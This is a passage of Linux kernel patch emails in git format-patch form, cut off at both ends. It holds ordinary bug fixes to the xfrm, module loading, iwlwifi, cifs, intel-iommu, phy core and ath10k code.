WMI_CRYPT_AES_GCMP; - conn.pairwise_crypto_len = 16; - conn.group_crypto_type = WMI_CRYPT_AES_GCMP; - conn.group_crypto_len = 16; - } else { + if (rsn_eid) { /* regular secure connection */ + conn.dot11_auth_mode = WMI_AUTH11_SHARED; + conn.auth_mode = WMI_AUTH_WPA2_PSK; + conn.pairwise_crypto_type = WMI_CRYPT_AES_GCMP; + conn.pairwise_crypto_len = 16; + conn.group_crypto_type = WMI_CRYPT_AES_GCMP; + conn.group_crypto_len = 16; + } else { /* WSC */ + conn.dot11_auth_mode = WMI_AUTH11_WSC; + conn.auth_mode = WMI_AUTH_NONE; + } + } else { /* insecure connection */ conn.dot11_auth_mode = WMI_AUTH11_OPEN; conn.auth_mode = WMI_AUTH_NONE; } From 586f2eb416f4271444e807b96346df3d30e8dfb5 Mon Sep 17 00:00:00 2001 From: Li RongQing Date: Thu, 30 Apr 2015 17:13:41 +0800 Subject: [PATCH 022/872] xfrm: remove the unnecessary checking before call xfrm_pol_hold xfrm_pol_hold will check its input with NULL Signed-off-by: Li RongQing Signed-off-by: Steffen Klassert --- net/xfrm/xfrm_policy.c | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c index c4c47f337a3a..435bc0dc7630 100644 --- a/net/xfrm/xfrm_policy.c +++ b/net/xfrm/xfrm_policy.c @@ -1127,8 +1127,8 @@ static struct xfrm_policy *xfrm_policy_lookup_bytype(struct net *net, u8 type, break; } } - if (ret) - xfrm_pol_hold(ret); + + xfrm_pol_hold(ret); fail: read_unlock_bh(&net->xfrm.xfrm_policy_lock); @@ -3211,8 +3211,7 @@ static struct xfrm_policy *xfrm_migrate_policy_find(const struct xfrm_selector * } } - if (ret) - xfrm_pol_hold(ret); + xfrm_pol_hold(ret); read_unlock_bh(&net->xfrm.xfrm_policy_lock); From de2ad486cb6cfdf3ef79a96a18d78bb1b135c0e0 Mon Sep 17 00:00:00 2001 From: Li RongQing Date: Thu, 30 Apr 2015 17:25:19 +0800 Subject: [PATCH 023/872] xfrm: move the checking for old xfrm_policy hold_queue to beginning if hold_queue of old xfrm_policy is NULL, return directly, then not need to run other codes, especially take the spin lock Signed-off-by: Li RongQing Signed-off-by: Steffen Klassert --- net/xfrm/xfrm_policy.c | 6 +++--- 
1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c index 435bc0dc7630..3d264e5e7409 100644 --- a/net/xfrm/xfrm_policy.c +++ b/net/xfrm/xfrm_policy.c @@ -700,6 +700,9 @@ static void xfrm_policy_requeue(struct xfrm_policy *old, struct xfrm_policy_queue *pq = &old->polq; struct sk_buff_head list; + if (skb_queue_empty(&pq->hold_queue)) + return; + __skb_queue_head_init(&list); spin_lock_bh(&pq->hold_queue.lock); @@ -708,9 +711,6 @@ static void xfrm_policy_requeue(struct xfrm_policy *old, xfrm_pol_put(old); spin_unlock_bh(&pq->hold_queue.lock); - if (skb_queue_empty(&list)) - return; - pq = &new->polq; spin_lock_bh(&pq->hold_queue.lock); From 37815bf866ab6722a47550f8d25ad3f1a16a680c Mon Sep 17 00:00:00 2001 From: Steven Rostedt Date: Sat, 9 May 2015 03:06:23 +0930 Subject: [PATCH 024/872] module: Call module notifier on failure after complete_formation() The module notifier call chain for MODULE_STATE_COMING was moved up before the parsing of args, into the complete_formation() call. But if the module failed to load after that, the notifier call chain for MODULE_STATE_GOING was never called and that prevented the users of those call chains from cleaning up anything that was allocated. Link: http://lkml.kernel.org/r/554C52B9.9060700@gmail.com Reported-by: Pontus Fuchs Fixes: 4982223e51e8 "module: set nx before marking module MODULE_STATE_COMING" Cc: stable@vger.kernel.org # 3.16+ Signed-off-by: Steven Rostedt Signed-off-by: Rusty Russell --- kernel/module.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/kernel/module.c b/kernel/module.c index 42a1d2afb217..cfc9e843a924 100644 --- a/kernel/module.c +++ b/kernel/module.c @@ -3370,6 +3370,9 @@ static int load_module(struct load_info *info, const char __user *uargs, module_bug_cleanup(mod); mutex_unlock(&module_mutex); + blocking_notifier_call_chain(&module_notify_list, + MODULE_STATE_GOING, mod); + /* we can't deallocate the module until we clear memory protection */ unset_module_init_ro_nx(mod); unset_module_core_ro_nx(mod); From 5f0d98f278f943cb6115b6fe4441f11a7015bb50 Mon Sep 17 00:00:00 2001 From: Emmanuel Grumbach Date: Thu, 30 Oct 2014 10:19:38 +0200 Subject: [PATCH 025/872] iwlwifi: mvm: forbid MIMO on devices that don't support it There are devices that forbid MIMO by means of the NVM. Detect those devices and forbid MIMO, otherwise the firmware would crash. STBC is still allowed on these devices. Signed-off-by: Emmanuel Grumbach --- .../net/wireless/iwlwifi/iwl-eeprom-parse.c | 5 +++++ .../net/wireless/iwlwifi/iwl-eeprom-parse.h | 3 +++ drivers/net/wireless/iwlwifi/iwl-nvm-parse.c | 19 +++++++++++++------ drivers/net/wireless/iwlwifi/mvm/rs.c | 3 +++ 4 files changed, 24 insertions(+), 6 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-eeprom-parse.c b/drivers/net/wireless/iwlwifi/iwl-eeprom-parse.c index 41ff85de7334..21302b6f2bfd 100644 --- a/drivers/net/wireless/iwlwifi/iwl-eeprom-parse.c +++ b/drivers/net/wireless/iwlwifi/iwl-eeprom-parse.c @@ -6,6 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2008 - 2014 Intel Corporation. All rights reserved. + * Copyright(c) 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -31,6 +32,7 @@ * BSD LICENSE * * Copyright(c) 2005 - 2014 Intel Corporation. All rights reserved. + * Copyright(c) 2015 Intel Mobile Communications GmbH * All rights reserved.
* * Redistribution and use in source and binary forms, with or without @@ -748,6 +750,9 @@ void iwl_init_ht_hw_capab(const struct iwl_cfg *cfg, return; } + if (data->sku_cap_mimo_disabled) + rx_chains = 1; + ht_info->ht_supported = true; ht_info->cap = IEEE80211_HT_CAP_DSSSCCK40; diff --git a/drivers/net/wireless/iwlwifi/iwl-eeprom-parse.h b/drivers/net/wireless/iwlwifi/iwl-eeprom-parse.h index 5234a0bf11e4..750c8c9ee70d 100644 --- a/drivers/net/wireless/iwlwifi/iwl-eeprom-parse.h +++ b/drivers/net/wireless/iwlwifi/iwl-eeprom-parse.h @@ -6,6 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2008 - 2014 Intel Corporation. All rights reserved. + * Copyright(c) 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -31,6 +32,7 @@ * BSD LICENSE * * Copyright(c) 2005 - 2014 Intel Corporation. All rights reserved. + * Copyright(c) 2015 Intel Mobile Communications GmbH * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -84,6 +86,7 @@ struct iwl_nvm_data { bool sku_cap_11ac_enable; bool sku_cap_amt_enable; bool sku_cap_ipan_enable; + bool sku_cap_mimo_disabled; u16 radio_cfg_type; u8 radio_cfg_step; diff --git a/drivers/net/wireless/iwlwifi/iwl-nvm-parse.c b/drivers/net/wireless/iwlwifi/iwl-nvm-parse.c index 83903a5025c2..cf86f3cdbb8e 100644 --- a/drivers/net/wireless/iwlwifi/iwl-nvm-parse.c +++ b/drivers/net/wireless/iwlwifi/iwl-nvm-parse.c @@ -6,7 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2008 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -32,7 +32,7 @@ * BSD LICENSE * * Copyright(c) 2005 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * All rights reserved. 
* * Redistribution and use in source and binary forms, with or without @@ -116,10 +116,11 @@ enum family_8000_nvm_offsets { /* SKU Capabilities (actual values from NVM definition) */ enum nvm_sku_bits { - NVM_SKU_CAP_BAND_24GHZ = BIT(0), - NVM_SKU_CAP_BAND_52GHZ = BIT(1), - NVM_SKU_CAP_11N_ENABLE = BIT(2), - NVM_SKU_CAP_11AC_ENABLE = BIT(3), + NVM_SKU_CAP_BAND_24GHZ = BIT(0), + NVM_SKU_CAP_BAND_52GHZ = BIT(1), + NVM_SKU_CAP_11N_ENABLE = BIT(2), + NVM_SKU_CAP_11AC_ENABLE = BIT(3), + NVM_SKU_CAP_MIMO_DISABLE = BIT(5), }; /* @@ -368,6 +369,11 @@ static void iwl_init_vht_hw_capab(const struct iwl_cfg *cfg, if (cfg->ht_params->ldpc) vht_cap->cap |= IEEE80211_VHT_CAP_RXLDPC; + if (data->sku_cap_mimo_disabled) { + num_rx_ants = 1; + num_tx_ants = 1; + } + if (num_tx_ants > 1) vht_cap->cap |= IEEE80211_VHT_CAP_TXSTBC; else @@ -610,6 +616,7 @@ iwl_parse_nvm_data(struct device *dev, const struct iwl_cfg *cfg, data->sku_cap_11n_enable = false; data->sku_cap_11ac_enable = data->sku_cap_11n_enable && (sku & NVM_SKU_CAP_11AC_ENABLE); + data->sku_cap_mimo_disabled = sku & NVM_SKU_CAP_MIMO_DISABLE; data->n_hw_addrs = iwl_get_n_hw_addrs(cfg, nvm_sw); diff --git a/drivers/net/wireless/iwlwifi/mvm/rs.c b/drivers/net/wireless/iwlwifi/mvm/rs.c index f9928f2c125f..33cd68ae7bf9 100644 --- a/drivers/net/wireless/iwlwifi/mvm/rs.c +++ b/drivers/net/wireless/iwlwifi/mvm/rs.c @@ -180,6 +180,9 @@ static bool rs_mimo_allow(struct iwl_mvm *mvm, struct ieee80211_sta *sta, if (iwl_mvm_vif_low_latency(mvmvif) && mvmsta->vif->p2p) return false; + if (mvm->nvm_data->sku_cap_mimo_disabled) + return false; + return true; } From f5d0684e848f01347ba510545822c205889f8acc Mon Sep 17 00:00:00 2001 From: Sachin Prabhu Date: Thu, 2 Apr 2015 14:51:35 +0100 Subject: [PATCH 026/872] cifs: Don't replace dentries for dfs mounts MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Doing a readdir on a dfs root can result in the dentries for directories with a dfs share mounted being replaced by new dentries for objects returned by the readdir call. These new dentries on shares mounted with unix extenstions show up as symlinks pointing to the dfs share. # mount -t cifs -o sec=none //vm140-31/dfsroot cifs # stat cifs/testlink/testfile; ls -l cifs File: ‘cifs/testlink/testfile’ Size: 0 Blocks: 0 IO Block: 16384 regular empty file Device: 27h/39d Inode: 130120 Links: 1 Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root) Access: 2015-03-31 13:55:50.106018200 +0100 Modify: 2015-03-31 13:55:50.106018200 +0100 Change: 2015-03-31 13:55:50.106018200 +0100 Birth: - total 0 drwxr-xr-x 2 root root 0 Mar 31 13:54 testdir lrwxrwxrwx 1 root root 19 Mar 24 14:25 testlink -> \vm140-31\test In the example above, the stat command mounts the dfs share at cifs/testlink. The subsequent ls on the dfsroot directory replaces the dentry for testlink with a symlink. In the earlier code, the d_invalidate command returned an -EBUSY error when attempting to invalidate directories. This stopped the code from replacing the directories with symlinks returned by the readdir call. Changes were recently made to the d_invalidate() command so that it no longer returns an error code. This results in the directory with the mounted dfs share being replaced by a symlink which denotes a dfs share. 
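A rough, self-contained model of the guard this patch adds (the actual change, in the diff below, is a d_mountpoint() check in cifs_prime_dcache(); the structures here are toys, not the VFS API):

#include <stdio.h>

struct toy_dentry {
	const char *name;
	int is_mountpoint;      /* stands in for d_mountpoint() */
	const char *target;     /* what the cached entry resolves to */
};

/* Refresh a cached entry from readdir results, unless something is
 * mounted on it, in which case the cached entry must be left alone. */
static void prime_entry(struct toy_dentry *d, const char *readdir_result)
{
	if (d->is_mountpoint)
		return;         /* the guard added by this patch */
	d->target = readdir_result;
}

int main(void)
{
	struct toy_dentry testlink = { "testlink", 1, "mounted dfs share" };

	prime_entry(&testlink, "symlink to the dfs share");
	printf("%s still resolves to: %s\n", testlink.name, testlink.target);
	return 0;
}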
Signed-off-by: Sachin Prabhu Reviewed-by: Jeff Layton Signed-off-by: Steve French --- fs/cifs/readdir.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/fs/cifs/readdir.c b/fs/cifs/readdir.c index b4a47237486b..b1eede3678a9 100644 --- a/fs/cifs/readdir.c +++ b/fs/cifs/readdir.c @@ -90,6 +90,8 @@ cifs_prime_dcache(struct dentry *parent, struct qstr *name, if (dentry) { inode = d_inode(dentry); if (inode) { + if (d_mountpoint(dentry)) + goto out; /* * If we're generating inode numbers, then we don't * want to clobber the existing one with the one that From bc8ebdc4f54cc944b0ecc0fb0d18b0ffbaab0468 Mon Sep 17 00:00:00 2001 From: Nakajima Akira Date: Fri, 13 Feb 2015 15:35:58 +0900 Subject: [PATCH 027/872] Fix that several functions handle incorrect value of mapchars Cifs client has problem with reserved chars filename. [BUG1] : several functions handle incorrect value of mapchars - cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SPECIAL_CHR); + cifs_remap(cifs_sb)); [BUG2] : forget to convert reserved chars when creating SymbolicLink. - CIFSUnixCreateSymLink() calls cifs_strtoUTF16 + CIFSUnixCreateSymLink() calls cifsConvertToUTF16() with remap [BUG3] : forget to convert reserved chars when getting SymbolicLink. - CIFSSMBUnixQuerySymLink() calls cifs_strtoUTF16 + CIFSSMBUnixQuerySymLink() calls cifsConvertToUTF16() with remap [BUG4] : /proc/mounts don't show "mapposix" when using mapposix mount option + cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SFM_CHR) + seq_puts(s, ",mapposix"); Reported-by: t.wede@kw-reneg.de Reported-by: Nakajima Akira Signed-off-by: Nakajima Akira Signed-off-by: Carl Schaefer Signed-off-by: Steve French --- fs/cifs/cifs_dfs_ref.c | 3 ++- fs/cifs/cifsfs.c | 2 ++ fs/cifs/cifsproto.h | 4 ++-- fs/cifs/cifssmb.c | 21 +++++++++++---------- fs/cifs/dir.c | 3 +-- fs/cifs/file.c | 3 +-- fs/cifs/inode.c | 6 ++---- fs/cifs/link.c | 3 ++- fs/cifs/smb1ops.c | 3 ++- 9 files changed, 25 insertions(+), 23 deletions(-) diff --git a/fs/cifs/cifs_dfs_ref.c b/fs/cifs/cifs_dfs_ref.c index 430e0348c99e..7dc886c9a78f 100644 --- a/fs/cifs/cifs_dfs_ref.c +++ b/fs/cifs/cifs_dfs_ref.c @@ -24,6 +24,7 @@ #include "cifsfs.h" #include "dns_resolve.h" #include "cifs_debug.h" +#include "cifs_unicode.h" static LIST_HEAD(cifs_dfs_automount_list); @@ -312,7 +313,7 @@ static struct vfsmount *cifs_dfs_do_automount(struct dentry *mntpt) xid = get_xid(); rc = get_dfs_path(xid, ses, full_path + 1, cifs_sb->local_nls, &num_referrals, &referrals, - cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SPECIAL_CHR); + cifs_remap(cifs_sb)); free_xid(xid); cifs_put_tlink(tlink); diff --git a/fs/cifs/cifsfs.c b/fs/cifs/cifsfs.c index f5089bde3635..0a9fb6b53126 100644 --- a/fs/cifs/cifsfs.c +++ b/fs/cifs/cifsfs.c @@ -469,6 +469,8 @@ cifs_show_options(struct seq_file *s, struct dentry *root) seq_puts(s, ",nouser_xattr"); if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SPECIAL_CHR) seq_puts(s, ",mapchars"); + if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SFM_CHR) + seq_puts(s, ",mapposix"); if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UNX_EMUL) seq_puts(s, ",sfu"); if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_BRL) diff --git a/fs/cifs/cifsproto.h b/fs/cifs/cifsproto.h index c31ce98c1704..c63fd1dde25b 100644 --- a/fs/cifs/cifsproto.h +++ b/fs/cifs/cifsproto.h @@ -361,11 +361,11 @@ extern int CIFSUnixCreateHardLink(const unsigned int xid, extern int CIFSUnixCreateSymLink(const unsigned int xid, struct cifs_tcon *tcon, const char *fromName, const char *toName, - const struct nls_table *nls_codepage); + const struct nls_table *nls_codepage, int 
remap); extern int CIFSSMBUnixQuerySymLink(const unsigned int xid, struct cifs_tcon *tcon, const unsigned char *searchName, char **syminfo, - const struct nls_table *nls_codepage); + const struct nls_table *nls_codepage, int remap); extern int CIFSSMBQuerySymLink(const unsigned int xid, struct cifs_tcon *tcon, __u16 fid, char **symlinkinfo, const struct nls_table *nls_codepage); diff --git a/fs/cifs/cifssmb.c b/fs/cifs/cifssmb.c index 84650a51c7c4..1091affba425 100644 --- a/fs/cifs/cifssmb.c +++ b/fs/cifs/cifssmb.c @@ -2784,7 +2784,7 @@ CIFSSMBCopy(const unsigned int xid, struct cifs_tcon *tcon, int CIFSUnixCreateSymLink(const unsigned int xid, struct cifs_tcon *tcon, const char *fromName, const char *toName, - const struct nls_table *nls_codepage) + const struct nls_table *nls_codepage, int remap) { TRANSACTION2_SPI_REQ *pSMB = NULL; TRANSACTION2_SPI_RSP *pSMBr = NULL; @@ -2804,9 +2804,9 @@ CIFSUnixCreateSymLink(const unsigned int xid, struct cifs_tcon *tcon, if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) { name_len = - cifs_strtoUTF16((__le16 *) pSMB->FileName, fromName, - /* find define for this maxpathcomponent */ - PATH_MAX, nls_codepage); + cifsConvertToUTF16((__le16 *) pSMB->FileName, fromName, + /* find define for this maxpathcomponent */ + PATH_MAX, nls_codepage, remap); name_len++; /* trailing null */ name_len *= 2; @@ -2828,9 +2828,9 @@ CIFSUnixCreateSymLink(const unsigned int xid, struct cifs_tcon *tcon, data_offset = (char *) (&pSMB->hdr.Protocol) + offset; if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) { name_len_target = - cifs_strtoUTF16((__le16 *) data_offset, toName, PATH_MAX - /* find define for this maxpathcomponent */ - , nls_codepage); + cifsConvertToUTF16((__le16 *) data_offset, toName, + /* find define for this maxpathcomponent */ + PATH_MAX, nls_codepage, remap); name_len_target++; /* trailing null */ name_len_target *= 2; } else { /* BB improve the check for buffer overruns BB */ @@ -3034,7 +3034,7 @@ CIFSCreateHardLink(const unsigned int xid, struct cifs_tcon *tcon, int CIFSSMBUnixQuerySymLink(const unsigned int xid, struct cifs_tcon *tcon, const unsigned char *searchName, char **symlinkinfo, - const struct nls_table *nls_codepage) + const struct nls_table *nls_codepage, int remap) { /* SMB_QUERY_FILE_UNIX_LINK */ TRANSACTION2_QPI_REQ *pSMB = NULL; @@ -3055,8 +3055,9 @@ CIFSSMBUnixQuerySymLink(const unsigned int xid, struct cifs_tcon *tcon, if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) { name_len = - cifs_strtoUTF16((__le16 *) pSMB->FileName, searchName, - PATH_MAX, nls_codepage); + cifsConvertToUTF16((__le16 *) pSMB->FileName, + searchName, PATH_MAX, nls_codepage, + remap); name_len++; /* trailing null */ name_len *= 2; } else { /* BB improve the check for buffer overruns BB */ diff --git a/fs/cifs/dir.c b/fs/cifs/dir.c index 338d56936f6a..c3eb998a99bd 100644 --- a/fs/cifs/dir.c +++ b/fs/cifs/dir.c @@ -620,8 +620,7 @@ int cifs_mknod(struct inode *inode, struct dentry *direntry, umode_t mode, } rc = CIFSSMBUnixSetPathInfo(xid, tcon, full_path, &args, cifs_sb->local_nls, - cifs_sb->mnt_cifs_flags & - CIFS_MOUNT_MAP_SPECIAL_CHR); + cifs_remap(cifs_sb)); if (rc) goto mknod_out; diff --git a/fs/cifs/file.c b/fs/cifs/file.c index cafbf10521d5..5cfa7129d876 100644 --- a/fs/cifs/file.c +++ b/fs/cifs/file.c @@ -140,8 +140,7 @@ int cifs_posix_open(char *full_path, struct inode **pinode, posix_flags = cifs_posix_convert_flags(f_flags); rc = CIFSPOSIXCreate(xid, tcon, posix_flags, mode, pnetfid, presp_data, poplock, full_path, cifs_sb->local_nls, - cifs_sb->mnt_cifs_flags & - 
CIFS_MOUNT_MAP_SPECIAL_CHR); + cifs_remap(cifs_sb)); cifs_put_tlink(tlink); if (rc) diff --git a/fs/cifs/inode.c b/fs/cifs/inode.c index 55b58112d122..ef71aa1515f6 100644 --- a/fs/cifs/inode.c +++ b/fs/cifs/inode.c @@ -373,8 +373,7 @@ int cifs_get_inode_info_unix(struct inode **pinode, /* could have done a find first instead but this returns more info */ rc = CIFSSMBUnixQPathInfo(xid, tcon, full_path, &find_data, - cifs_sb->local_nls, cifs_sb->mnt_cifs_flags & - CIFS_MOUNT_MAP_SPECIAL_CHR); + cifs_sb->local_nls, cifs_remap(cifs_sb)); cifs_put_tlink(tlink); if (!rc) { @@ -2215,8 +2214,7 @@ cifs_setattr_unix(struct dentry *direntry, struct iattr *attrs) pTcon = tlink_tcon(tlink); rc = CIFSSMBUnixSetPathInfo(xid, pTcon, full_path, args, cifs_sb->local_nls, - cifs_sb->mnt_cifs_flags & - CIFS_MOUNT_MAP_SPECIAL_CHR); + cifs_remap(cifs_sb)); cifs_put_tlink(tlink); } diff --git a/fs/cifs/link.c b/fs/cifs/link.c index 252e672d5604..e6c707cc62b3 100644 --- a/fs/cifs/link.c +++ b/fs/cifs/link.c @@ -717,7 +717,8 @@ cifs_symlink(struct inode *inode, struct dentry *direntry, const char *symname) rc = create_mf_symlink(xid, pTcon, cifs_sb, full_path, symname); else if (pTcon->unix_ext) rc = CIFSUnixCreateSymLink(xid, pTcon, full_path, symname, - cifs_sb->local_nls); + cifs_sb->local_nls, + cifs_remap(cifs_sb)); /* else rc = CIFSCreateReparseSymLink(xid, pTcon, fromName, toName, cifs_sb_target->local_nls); */ diff --git a/fs/cifs/smb1ops.c b/fs/cifs/smb1ops.c index 7bfdd6066276..fc537c29044e 100644 --- a/fs/cifs/smb1ops.c +++ b/fs/cifs/smb1ops.c @@ -960,7 +960,8 @@ cifs_query_symlink(const unsigned int xid, struct cifs_tcon *tcon, /* Check for unix extensions */ if (cap_unix(tcon->ses)) { rc = CIFSSMBUnixQuerySymLink(xid, tcon, full_path, target_path, - cifs_sb->local_nls); + cifs_sb->local_nls, + cifs_remap(cifs_sb)); if (rc == -EREMOTE) rc = cifs_unix_dfs_readlink(xid, tcon, full_path, target_path, From 4ed6a540fab8ea4388c1703b73ecfed68a2009d1 Mon Sep 17 00:00:00 2001 From: David Woodhouse Date: Mon, 11 May 2015 14:59:20 +0100 Subject: [PATCH 028/872] iommu/vt-d: Fix passthrough mode with translation-disabled devices When we use 'intel_iommu=igfx_off' to disable translation for the graphics, and when we discover that the BIOS has misconfigured the DMAR setup for I/OAT, we use a special DUMMY_DEVICE_DOMAIN_INFO value in dev->archdata.iommu to indicate that translation is disabled. With passthrough mode, we were attempting to dereference that as a normal pointer to a struct device_domain_info when setting up an identity mapping for the affected device. This fixes the problem by making device_to_iommu() explicitly check for the special value and indicate that no IOMMU was found to handle the devices in question. 
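A minimal user-space sketch of the sentinel check being added; the real code compares dev->archdata.iommu against DUMMY_DEVICE_DOMAIN_INFO inside device_to_iommu() (see the diff that follows), and the names here are simplified stand-ins:

#include <stdio.h>

/* Stand-in for DUMMY_DEVICE_DOMAIN_INFO: a unique, valid address that
 * never points at a real per-device info structure. */
static char dummy_marker;
#define DUMMY_INFO ((void *)&dummy_marker)

struct toy_device {
	void *iommu_info;       /* real info pointer, DUMMY_INFO, or NULL */
};

/* Mirrors the fix: never dereference the sentinel, report that no
 * IOMMU handles this device instead. */
static void *device_to_info(struct toy_device *dev)
{
	if (dev->iommu_info == DUMMY_INFO)
		return NULL;
	return dev->iommu_info;
}

int main(void)
{
	struct toy_device igfx = { DUMMY_INFO };

	printf("translation-disabled device -> %p\n", device_to_info(&igfx));
	return 0;
}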
Signed-off-by: David Woodhouse Cc: stable@vger.kernel.org (which means you can pick up 18436afdc now too) --- drivers/iommu/intel-iommu.c | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/drivers/iommu/intel-iommu.c b/drivers/iommu/intel-iommu.c index 68d43beccb7e..2ffe58969944 100644 --- a/drivers/iommu/intel-iommu.c +++ b/drivers/iommu/intel-iommu.c @@ -696,6 +696,11 @@ static inline struct context_entry *iommu_context_addr(struct intel_iommu *iommu return &context[devfn]; } +static int iommu_dummy(struct device *dev) +{ + return dev->archdata.iommu == DUMMY_DEVICE_DOMAIN_INFO; +} + static struct intel_iommu *device_to_iommu(struct device *dev, u8 *bus, u8 *devfn) { struct dmar_drhd_unit *drhd = NULL; @@ -705,6 +710,9 @@ static struct intel_iommu *device_to_iommu(struct device *dev, u8 *bus, u8 *devf u16 segment = 0; int i; + if (iommu_dummy(dev)) + return NULL; + if (dev_is_pci(dev)) { pdev = to_pci_dev(dev); segment = pci_domain_nr(pdev->bus); @@ -2969,11 +2977,6 @@ static inline struct dmar_domain *get_valid_domain_for_dev(struct device *dev) return __get_valid_domain_for_dev(dev); } -static int iommu_dummy(struct device *dev) -{ - return dev->archdata.iommu == DUMMY_DEVICE_DOMAIN_INFO; -} - /* Check if the dev needs to go through non-identity map and unmap process.*/ static int iommu_no_mapping(struct device *dev) { From f83be4c3f69762e1fc736e375b04e5c22b3ddceb Mon Sep 17 00:00:00 2001 From: Axel Lin Date: Wed, 8 Apr 2015 07:30:15 +0800 Subject: [PATCH 029/872] phy: core: Fix error checking in (devm_)phy_optional_get Don't pass a valid pointer to PTR_ERR; use PTR_ERR(phy) only when IS_ERR(phy) is true. Signed-off-by: Axel Lin Signed-off-by: Kishon Vijay Abraham I --- drivers/phy/phy-core.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/phy/phy-core.c b/drivers/phy/phy-core.c index 3791838f4bd4..63bc12d7a73e 100644 --- a/drivers/phy/phy-core.c +++ b/drivers/phy/phy-core.c @@ -530,7 +530,7 @@ struct phy *phy_optional_get(struct device *dev, const char *string) { struct phy *phy = phy_get(dev, string); - if (PTR_ERR(phy) == -ENODEV) + if (IS_ERR(phy) && (PTR_ERR(phy) == -ENODEV)) phy = NULL; return phy; @@ -584,7 +584,7 @@ struct phy *devm_phy_optional_get(struct device *dev, const char *string) { struct phy *phy = devm_phy_get(dev, string); - if (PTR_ERR(phy) == -ENODEV) + if (IS_ERR(phy) && (PTR_ERR(phy) == -ENODEV)) phy = NULL; return phy; From 184a394eea16d61b85444c73349ced7f91f79af2 Mon Sep 17 00:00:00 2001 From: Peter Oh Date: Mon, 4 May 2015 11:21:24 -0700 Subject: [PATCH 030/872] ath10k: increase relay buffer size of spectral scan The spectral scan supported by ath10k can monitor and report across whole bands and channels, but the current buffer size is too small to hold the reported spectral scan data. This results in 5G channel reports being dropped entirely when a dual-band card is used, so users are not able to analyze the spectral environment. Hence increase the buffer size to fix the problem. The spectral data size varies with the number of bins, so the unit buffer size, 1140, is chosen to minimize relay buffer fragmentation. The total buffer size is also chosen as a tradeoff between spectral scan coverage and kernel memory consumption. Since the theoretical maximum buffer size, 9.5MB, can be consumed with 512 bins in dual bands, we target covering up to 128 bins for all channels in both bands; due to the buffer size limitation, spectral scans with more than 128 bins need to be run on a single band at a time.
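For reference, the relay buffer totals implied by the old and new relay_open() arguments (1024 x 256 before, 1140 x 2500 after, both visible in the diff below) can be checked with a trivial stand-alone calculation; this only illustrates the sizing tradeoff discussed above and is not driver code:

#include <stdio.h>

/* relay buffer = sub-buffer size * number of sub-buffers */
static void show(const char *tag, long subbuf_size, long n_subbufs)
{
	long total = subbuf_size * n_subbufs;

	printf("%s: %ld x %ld = %ld bytes (~%.2f MiB)\n",
	       tag, subbuf_size, n_subbufs, total, total / (1024.0 * 1024.0));
}

int main(void)
{
	show("old relay buffer", 1024, 256);
	show("new relay buffer", 1140, 2500);
	return 0;
}

The change grows the relay buffer from about 0.25 MiB to about 2.7 MiB, still well below the roughly 9.5 MB worst case quoted above for 512 bins on both bands.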
Signed-off-by: Peter Oh Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/ath10k/spectral.c | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/drivers/net/wireless/ath/ath10k/spectral.c b/drivers/net/wireless/ath/ath10k/spectral.c index d22addf6118b..8dcd424aa502 100644 --- a/drivers/net/wireless/ath/ath10k/spectral.c +++ b/drivers/net/wireless/ath/ath10k/spectral.c @@ -519,9 +519,12 @@ int ath10k_spectral_vif_stop(struct ath10k_vif *arvif) int ath10k_spectral_create(struct ath10k *ar) { + /* The buffer size covers whole channels in dual bands up to 128 bins. + * Scan with bigger than 128 bins needs to be run on single band each. + */ ar->spectral.rfs_chan_spec_scan = relay_open("spectral_scan", ar->debug.debugfs_phy, - 1024, 256, + 1140, 2500, &rfs_spec_scan_cb, NULL); debugfs_create_file("spectral_scan_ctl", S_IRUSR | S_IWUSR, From 2c2d2fafe21652789437e5a1a8b2770a45adc259 Mon Sep 17 00:00:00 2001 From: Vasanthakumar Thiagarajan Date: Tue, 5 May 2015 18:00:48 +0530 Subject: [PATCH 031/872] ath10k: fix survey information reporting Rx clear count reported in wmi_chan_info_event is actually channel_busy_count not rx_frame_count. Send rx_clear_count through time_busy of survey_info and set SURVEY_INFO_TIME_BUSY in filled. iw wlan0 survey dump urvey data from wlan0 frequency: 5180 MHz [in use] noise: -103 dBm channel active time: 150 ms channel busy time: 22 ms Survey data from wlan0 frequency: 5200 MHz noise: -102 dBm channel active time: 146 ms channel busy time: 0 ms Signed-off-by: Vasanthakumar Thiagarajan Signed-off-by: Kalle Valo --- 